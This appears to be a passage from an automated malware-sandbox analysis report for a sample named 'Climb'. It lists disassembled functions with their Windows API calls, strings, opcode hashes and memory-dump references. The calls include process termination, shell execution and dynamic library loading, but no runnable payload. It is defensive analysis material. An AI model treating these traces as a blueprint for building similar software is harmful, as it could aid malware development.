Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: 2acaa7e995a91b115e7af18b327006b4cb8f3ceb66205cccf7ab0a4f05068561
Instruction ID: a1d39675f5b53b5ec79611293eb83e4c0e26b918a396ecd4ade849c20dd1e001
Opcode Fuzzy Hash: 2acaa7e995a91b115e7af18b327006b4cb8f3ceb66205cccf7ab0a4f05068561
Instruction Fuzzy Hash: E5D13475A042019FC714DF28C584A2ABBF5FF89714F14895EF8869B361DB31EC45CB92

Function 00AF86FC Relevance: 9.1, APIs: 6, Instructions: 82COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 00AF8740
SetWindowLongW.USER32(00000000,000000F0,?), ref: 00AF8765
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00AF877D
GetSystemMetrics.USER32(00000004), ref: 00AF87A6
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00ADC1F2,00000000), ref: 00AF87C6

Part of subcall function 00A6249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00A624B0

GetSystemMetrics.USER32(00000004), ref: 00AF87B1

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 0603ed2f9918a2ad8891007ff02d38906828303abaee8fc58ab9227bb2e3b0d7
Instruction ID: 9eab3862e7e9b7b83703ce1c54158d8dcd644d2b626d44e613beda13b75f0348
Opcode Fuzzy Hash: 0603ed2f9918a2ad8891007ff02d38906828303abaee8fc58ab9227bb2e3b0d7
Instruction Fuzzy Hash: 4D2192716102499FCB25AFB8CC08B7E3BA6EB45325F354629FA26C31E0DF349851CB10

Function 00A836F2 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00A836E9,00A83355), ref: 00A83700
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00A8370E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00A83727
SetLastError.KERNEL32(00000000,?,00A836E9,00A83355), ref: 00A83779

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 0ccd0232e5f51e80ade9174cecf82e686bdf6aefd39c4bc1751026df172c1891
Instruction ID: eea1d5ffbc078ab6401bbb59d7767937a6e5488abe8bfa65c62242deb041e9df
Opcode Fuzzy Hash: 0ccd0232e5f51e80ade9174cecf82e686bdf6aefd39c4bc1751026df172c1891
Instruction Fuzzy Hash: 8201B5B361A3116EAE3577B5AD9A96B2694EB05FB17300329F110450F0EF528D029340

Function 00A930E7 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,00A84D53,00000000,?,?,00A868E2,?,?,00000000), ref: 00A930EB
_free.LIBCMT ref: 00A9311E
_free.LIBCMT ref: 00A93146
SetLastError.KERNEL32(00000000,?,00000000), ref: 00A93153
SetLastError.KERNEL32(00000000,?,00000000), ref: 00A9315F
_abort.LIBCMT ref: 00A93165

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 0fa1e1deaf5fb8bd6a1222e0c8f5188e11eeddd86c8969e86dedea519fc9052b
Instruction ID: 7b383a48eed0051fa2554c0eaf484a035de8f57ba0e569a8a7e6f6c5f4b5914c
Opcode Fuzzy Hash: 0fa1e1deaf5fb8bd6a1222e0c8f5188e11eeddd86c8969e86dedea519fc9052b
Instruction Fuzzy Hash: 07F0A43B74550036CF226775AE06B6E26FA9FC5771B310624FA24E62F1EF208A039261

Function 00AF9480 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00A61F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00A61F87
Part of subcall function 00A61F2D: SelectObject.GDI32(?,00000000), ref: 00A61F96
Part of subcall function 00A61F2D: BeginPath.GDI32(?), ref: 00A61FAD
Part of subcall function 00A61F2D: SelectObject.GDI32(?,00000000), ref: 00A61FD6

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00AF94AA
LineTo.GDI32(?,00000003,00000000), ref: 00AF94BE
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00AF94CC
LineTo.GDI32(?,00000000,00000003), ref: 00AF94DC
EndPath.GDI32(?), ref: 00AF94EC
StrokePath.GDI32(?), ref: 00AF94FC

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 596a31b574389c0f404ef63fe51717cdbc530c102726e332e9f0b7aa63c7f97b
Instruction ID: d43a8479f4969530c90ff01e3b139f2e7e92e562796eeab7f9203a923f3287a6
Opcode Fuzzy Hash: 596a31b574389c0f404ef63fe51717cdbc530c102726e332e9f0b7aa63c7f97b
Instruction Fuzzy Hash: B111DB7600010DBFDF129FD0EC89FAA7F6DEF09364F048121BA1A5A161CB719D56DBA0

Function 00AC5B61 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00AC5B7C
GetDeviceCaps.GDI32(00000000,00000058), ref: 00AC5B8D
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00AC5B94
ReleaseDC.USER32(00000000,00000000), ref: 00AC5B9C
MulDiv.KERNEL32(000009EC,?,00000000), ref: 00AC5BB3
MulDiv.KERNEL32(000009EC,00000001,?), ref: 00AC5BC5

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 6935c3047500e68160dad541d095d0ea4161058b95988209a9dcc3136ba25f39
Instruction ID: 8d86e8bd5637c794c211e5ae3cdd5cf207d881ab1f0035ea4cdc04f8a10723c6
Opcode Fuzzy Hash: 6935c3047500e68160dad541d095d0ea4161058b95988209a9dcc3136ba25f39
Instruction Fuzzy Hash: 72012C75E00719BBEB119FE59C49F5ABFA9EB49751F004065FA09AB280D670AC01CBA0

Function 00A6327E Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00A632AF
MapVirtualKeyW.USER32(00000010,00000000), ref: 00A632B7
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00A632C2
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00A632CD
MapVirtualKeyW.USER32(00000011,00000000), ref: 00A632D5
MapVirtualKeyW.USER32(00000012,00000000), ref: 00A632DD

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: f3a23c14ba269a954110fcaf3999ec1a4bd999fd081b9f50ecdae87c13c35ba1
Instruction ID: 5ec83647ed8a1cd5789ed64cea91877a0f4d656acff668ff5690efec7c10c8fc
Opcode Fuzzy Hash: f3a23c14ba269a954110fcaf3999ec1a4bd999fd081b9f50ecdae87c13c35ba1
Instruction Fuzzy Hash: 7A016CB09017597DE3008F5A8C85B52FFA8FF19354F00411B915C47941C7F5A864CBE5

Function 00ACF437 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00ACF447
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00ACF45D
GetWindowThreadProcessId.USER32(?,?), ref: 00ACF46C
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00ACF47B
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00ACF485
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00ACF48C

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: ad9b44805ca720a69323f0bedd9a1c3abfaec990df22607af0879e193d90a407
Instruction ID: dea3140df969f2a86b8ac40817a24162a5cda04aa20251a8b0cecf50debf82a2
Opcode Fuzzy Hash: ad9b44805ca720a69323f0bedd9a1c3abfaec990df22607af0879e193d90a407
Instruction Fuzzy Hash: 2AF03A32241158BBE7229BE29C0EEFF7B7DEFC6B11F000158F601D6090D7A46A42D6B9

Function 00AA34D6 Relevance: 9.0, APIs: 6, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 00AA34EF
SendMessageW.USER32(?,00001328,00000000,?), ref: 00AA3506
GetWindowDC.USER32(?), ref: 00AA3512
GetPixel.GDI32(00000000,?,?), ref: 00AA3521
ReleaseDC.USER32(?,00000000), ref: 00AA3533
GetSysColor.USER32(00000005), ref: 00AA354D

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: b19ffb30b8fe7bc28b7602d35dc377e23d0a0638c49cff621d45b07d26fe2551
Instruction ID: 6a9321004098f0606b98913d9123bfecb0958460368206b466d8442c542f4e40
Opcode Fuzzy Hash: b19ffb30b8fe7bc28b7602d35dc377e23d0a0638c49cff621d45b07d26fe2551
Instruction Fuzzy Hash: 26012832500205EFDB629BE4DC08BF97BB2FB05321F500164F91AA61A0CB321E52EB10

Function 00AC21C1 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00AC21CC
UnloadUserProfile.USERENV(?,?), ref: 00AC21D8
CloseHandle.KERNEL32(?), ref: 00AC21E1
CloseHandle.KERNEL32(?), ref: 00AC21E9
GetProcessHeap.KERNEL32(00000000,?), ref: 00AC21F2
HeapFree.KERNEL32(00000000), ref: 00AC21F9

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 02d510f360ffff390b412db2c7c4c7bfdc0cae294f2e6fbbb191420a0fe8440f
Instruction ID: 5e67eab92aad4dd905ac620024404d58df7c01488737728aa2212d7c8f91cf83
Opcode Fuzzy Hash: 02d510f360ffff390b412db2c7c4c7bfdc0cae294f2e6fbbb191420a0fe8440f
Instruction Fuzzy Hash: D1E0E576004105BBDB02AFE1EC0CD2ABF3AFF49322B104320F32586070CB329422EB54

Function 00ACCE7B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A641EA: _wcslen.LIBCMT ref: 00A641EF

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00ACCF99
_wcslen.LIBCMT ref: 00ACCFE0
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00ACD047
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00ACD075

Strings

0, xrefs: 00ACCF5A

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: 0
API String ID: 1227352736-4108050209
Opcode ID: 8d8aa7ff810b9b84f25f8fbb6c1f3f555915faafeb4bda98e306c650ec80f75d
Instruction ID: e0cfe2baa1f0a46dfaf795d332e2826771657de55090142915287f69b1286d27
Opcode Fuzzy Hash: 8d8aa7ff810b9b84f25f8fbb6c1f3f555915faafeb4bda98e306c650ec80f75d
Instruction Fuzzy Hash: 1551CE716043009BD715AF28C945F6BBBE8AF45324F050A3DF99AE7191DB70CD45C792

Function 00AEB7C4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 00AEB903

Part of subcall function 00A641EA: _wcslen.LIBCMT ref: 00A641EF

GetProcessId.KERNEL32(00000000), ref: 00AEB998
CloseHandle.KERNEL32(00000000), ref: 00AEB9C7

Strings

<, xrefs: 00AEB8CB
@, xrefs: 00AEB8D2

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: cd355af299a16884806a59d709ba3a138efde2d2e855b5b7edba87f39bd97bcc
Instruction ID: bbb16dbcdf3ab081f93cec62dd78d53b48d2facf7fc5709bdc872dccf395e981
Opcode Fuzzy Hash: cd355af299a16884806a59d709ba3a138efde2d2e855b5b7edba87f39bd97bcc
Instruction Fuzzy Hash: 59718A75A10215DFCB10EFA5C598A9EBBF5FF08310F048499E856AB392CB35ED41CBA0

Function 00AC7B05 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00AC7B6D
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00AC7BA3
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00AC7BB4
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00AC7C36

Strings

DllGetClassObject, xrefs: 00AC7BA9

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 73e4b2b516fe2689c3f28295d66eb5f2b980ae93216866e353a9ee10850e2490
Instruction ID: a6235968fee3eac765fd4767266865c6a80346f95337d87d6473ecc755d8b681
Opcode Fuzzy Hash: 73e4b2b516fe2689c3f28295d66eb5f2b980ae93216866e353a9ee10850e2490
Instruction Fuzzy Hash: BB417BB1608206AFDB15DF64D884FAE7BB9EF44310F1580ADA9069F205DBB0DD44CFA0

Function 00AF4818 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AF48D1
IsMenu.USER32(?), ref: 00AF48E6
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00AF492E
DrawMenuBar.USER32 ref: 00AF4941

Strings

0, xrefs: 00AF4825

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert
String ID: 0
API String ID: 3076010158-4108050209
Opcode ID: a61cd53c8a4bb9c03e443634647073313d227b40fd6eef55a563a3ca3cb11578
Instruction ID: 616ce544dc4903ab37281fdda6248b747382a277c2b998dbe538e9eeca579caf
Opcode Fuzzy Hash: a61cd53c8a4bb9c03e443634647073313d227b40fd6eef55a563a3ca3cb11578
Instruction Fuzzy Hash: 5F414C75A0020DEFDB20CFA1D8C4AABBBB5FF09364F148129FA4597260D770AD45CBA0

Function 00AC272F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A6B329: _wcslen.LIBCMT ref: 00A6B333

Part of subcall function 00AC45FD: GetClassNameW.USER32(?,?,000000FF), ref: 00AC4620

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00AC27B3
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00AC27C6
SendMessageW.USER32(?,00000189,?,00000000), ref: 00AC27F6

Part of subcall function 00A68577: _wcslen.LIBCMT ref: 00A6858A

Strings

ComboBox, xrefs: 00AC273D
ListBox, xrefs: 00AC2772

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: MessageSend$_wcslen$ClassName
String ID: ComboBox$ListBox
API String ID: 2081771294-1403004172
Opcode ID: 51a68fdb35d401cde857f8e85abdc94e07061650a697fcd817c1d818652a225b
Instruction ID: 1e148c0f3adabe051a453d2718927b780a6ca838837b79c4fdf1a3a841a2df4e
Opcode Fuzzy Hash: 51a68fdb35d401cde857f8e85abdc94e07061650a697fcd817c1d818652a225b
Instruction Fuzzy Hash: 7021F771A00104BFDB15ABA4DC8AEFFBBB9DF45760B11422DF422A71E1DB38494AD760

Function 00AF39B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00AF3A29
LoadLibraryW.KERNEL32(?), ref: 00AF3A30
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00AF3A45
DestroyWindow.USER32(?), ref: 00AF3A4D

Strings

SysAnimate32, xrefs: 00AF3A04

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: 716bfd21e1f6f632e76ee6c9e70c1d91fb980a6fea4e65d7fec393ee4e36b042
Instruction ID: 948a508031c20c98ffb94aecfcbda5acd39a910d938edaaea0a78cb5e63e5951
Opcode Fuzzy Hash: 716bfd21e1f6f632e76ee6c9e70c1d91fb980a6fea4e65d7fec393ee4e36b042
Instruction Fuzzy Hash: C221AEB2600209ABEF11AFE5DC90FBB77A9EF453A4F105618FB91971A0C7B2CD419760

Function 00A850DD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00A8508E,?,?,00A8502E,?,00B298D8,0000000C,00A85185,?,00000002), ref: 00A850FD
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00A85110
FreeLibrary.KERNEL32(00000000,?,?,?,00A8508E,?,?,00A8502E,?,00B298D8,0000000C,00A85185,?,00000002,00000000), ref: 00A85133

Strings

mscoree.dll, xrefs: 00A850F6
CorExitProcess, xrefs: 00A85108

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
